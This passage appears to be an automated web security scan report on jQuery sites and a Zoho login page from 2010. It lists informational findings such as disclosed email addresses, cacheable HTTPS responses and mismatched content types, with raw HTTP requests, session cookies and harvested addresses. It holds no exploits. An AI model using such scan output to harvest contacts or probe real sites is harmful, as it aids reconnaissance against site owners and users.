Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...
<a href='mailto:todd@filamentgroup.com' target='_blank'>todd@filamentgroup.com</a>
...[SNIP]...

8.2. http://forum.jquery.com/jquery-conferences/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-conferences/feed

Issue detail

The following email address was disclosed in the response:

Request

GET /jquery-conferences/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=40FF9D5D8C2F7ABAE6ABFBC5F54B4EDD; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:29 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...
<a href="mailto:bn.reinhart@gmail.com" target="_blank">bn.reinhart@gmail.com</a>
...[SNIP]...

8.3. http://forum.jquery.com/user/jeresig

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/jeresig

Issue detail

The following email addresses were disclosed in the response:

Request

GET /user/jeresig HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6B51C808310C43BC59A7FCE896A79140; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:01 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href='mailto:uno@biyubi.com' target='_blank'>uno@biyubi.com</a>
...[SNIP]...
<a href='mailto:jeresig@gmail.com' target='_blank'>jeresig@gmail.com</a>
...[SNIP]...

8.4. http://forum.jquery.com/user/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/malsup

Issue detail

The following email addresses were disclosed in the response:

Request

GET /user/malsup HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:23:18 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:Jquery-dev@bassistance.de' target='_blank'>Jquery-dev@bassistance.de</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:Jquery-dev@bassistance.de' target='_blank'>Jquery-dev@bassistance.de</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...

8.5. http://forum.jquery.com/user/wycats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/wycats

Issue detail

The following email address was disclosed in the response:

Request

GET /user/wycats HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=25EEAA759D352A30C3AA8E23615DFCFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:10 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...

8.6. http://plugins.jquery.com/sites/all/themes/jquery/js/jquery-plugins.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://plugins.jquery.com
Path:   /sites/all/themes/jquery/js/jquery-plugins.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sites/all/themes/jquery/js/jquery-plugins.js?f HTTP/1.1
Accept: */*
Referer: http://plugins.jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: plugins.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.2.10.1289872970; __utmc=44433727; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSabdcf03bfc020aa07e9f024d8c52c72f=uh580qfuh5d3titc2noqj80hu3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:23:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 18 Aug 2009 22:41:44 GMT
ETag: "5780c00-2948-3909da00"
Accept-Ranges: bytes
Content-Length: 10568
Cache-Control: max-age=1209600
Expires: Tue, 30 Nov 2010 02:23:37 GMT
Connection: close
Content-Type: application/x-javascript

//jQuery Plugin: Drop Shadow Text
// call like this: $(element).textDropShadow();
(function($) {
$.fn.textDropShadow = function(){
    $(this).html('<span class="jq-shadow">'+$(this).html()+'</span><sp
...[SNIP]...
$(this).removeClass('hover');
       }
       );
   });
}

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
eval(function(p,a,c,k
...[SNIP]...
title', '* This link opens in a new window');
   return jQuery(this);
}


/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights"
* by:
Scott Jehl (scott@filamentgroup.com)
Todd Parker (todd@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2007 Filament Group
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Description: Compares the heights of the first
...[SNIP]...

8.7. http://static.jquery.com/files/rocker/scripts/custom.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.jquery.com
Path:   /files/rocker/scripts/custom.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /files/rocker/scripts/custom.js HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: static.jquery.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Tue, 16 Nov 2010 02:24:45 GMT
ETag: "9ed053a-2948-3909da00+gzip"
Last-Modified: Tue, 18 Aug 2009 22:41:44 GMT
Server: ECS (dfw/562C)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 10568

//jQuery Plugin: Drop Shadow Text
// call like this: $(element).textDropShadow();
(function($) {
$.fn.textDropShadow = function(){
    $(this).html('<span class="jq-shadow">'+$(this).html()+'</span><sp
...[SNIP]...
$(this).removeClass('hover');
       }
       );
   });
}

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
eval(function(p,a,c,k
...[SNIP]...
title', '* This link opens in a new window');
   return jQuery(this);
}


/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights"
* by:
Scott Jehl (scott@filamentgroup.com)
Todd Parker (todd@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2007 Filament Group
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Description: Compares the heights of the first
...[SNIP]...

8.8. http://static.jquery.com/jobs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.jquery.com
Path:   /jobs.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jobs.js HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: static.jquery.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Tue, 16 Nov 2010 02:24:52 GMT
ETag: "9e685c4-3235-527c9000+gzip"
Last-Modified: Mon, 28 Sep 2009 21:53:04 GMT
Server: ECS (dfw/566D)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 12853

var jobs = [{"id":"741","type_id":"3","category_id":"1","category_name":"Developers","company":"Schematic","url":"http:\/\/www.schematic.com","title":"Freelance Sr. Front End Developer","url_title":"f
...[SNIP]...
r experience designers, interface designers, other technologists, and client representatives from a similarly broad range of disciplines are an absolute must.\r\n\r\nPlease apply by sending your CV to recruiting@schematic.com , using a subject heading of \"Freelance Senior IEG Front End Developer LA.\" Please include a cover letter outlining your hourly rate, skills and experience, and indicate the two URLs that you feel
...[SNIP]...

8.9. http://static.jquery.com/ui/themeroller/scripts/app.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.jquery.com
Path:   /ui/themeroller/scripts/app.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ui/themeroller/scripts/app.js HTTP/1.1
Accept: */*
Referer: http://jqueryui.com/themeroller/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: static.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utmc=44433727

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Tue, 16 Nov 2010 02:25:02 GMT
ETag: "9ed01be-5c75-45142080+gzip"
Last-Modified: Tue, 18 Aug 2009 22:45:06 GMT
Server: ECS (dfw/5631)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 23669


//add js to html element for css selectors
document.documentElement.className = 'js';

//global - TR app or bookmarklet
var bookmarklet = window.location.href.indexOf('developertool') > -1;

/
...[SNIP]...

* @ Original idea by by Binny V A, Original version: 2.00.A
* @ http://www.openjs.com/scripts/events/keyboard_shortcuts/
* @ Original License : BSD

* @ jQuery Plugin by Tzury Bar Yochay
mail: tzury.by@gmail.com
blog: evalinux.wordpress.com
face: facebook.com/profile.php?id=513676303

(c) Copyrights 2007

* @ jQuery Plugin version Beta (0.0.2)
* @ License: jQuery-License.

TODO:
add queue support (a
...[SNIP]...

9. Cacheable HTTPS response

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /login

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /login HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=56D46261849046C7540AB31DBC7DA0AD; iamcsr=8ef599d1-4822-4851-912e-a79d06e36308; IAMAGENTTICKET=;

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:41 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...

10. Multiple content types specified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile/feed

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /developing-jquery-mobile/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=42A9B18DCA94367EB89AE1F90A3E8A5E; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:31 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...
<div><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Style-Type" content="text/css">
...[SNIP]...
</div><meta http-equiv="content-type" content="text/html; charset=UTF-8">]]>
...[SNIP]...

11. HTML does not specify charset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /themeroller/_rollyourown.php HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.5.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:34:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 37805


<!-- Download theme button -->
<a href="/download?themeParams=" id="downloadTheme" class="corner-all"><span class="icon"></span><strong>Download</strong> theme</a>

<form method="get" action="/"
...[SNIP]...

12. Content type incorrectly stated

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bugs.jquery.com
Path:   /search/opensearch

Issue detail

The response contains the following Content-type statement:

The response states that it contains script. However, it actually appears to contain XML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /search/opensearch HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: bugs.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); trac_session=ef3b3632c1eb2698d8a6210a; __utma=119074714.56097933.1289873044.1289873044.1289873044.1; __utmb=119074714.1.10.1289873044; __utmz=119074714.1289873044.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 Ok
Server: nginx/0.7.65
Date: Tue, 16 Nov 2010 02:23:38 GMT
Content-Type: application/opensearchdescription+xml;charset=utf-8
Connection: keep-alive
Cache-Control: must-revalidate
Content-Length: 408

<?xml version="1.0"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Search jQuery Core</ShortName>
<InputEncoding>UTF-8</InputEncoding>
<Image width="16" height
...[SNIP]...
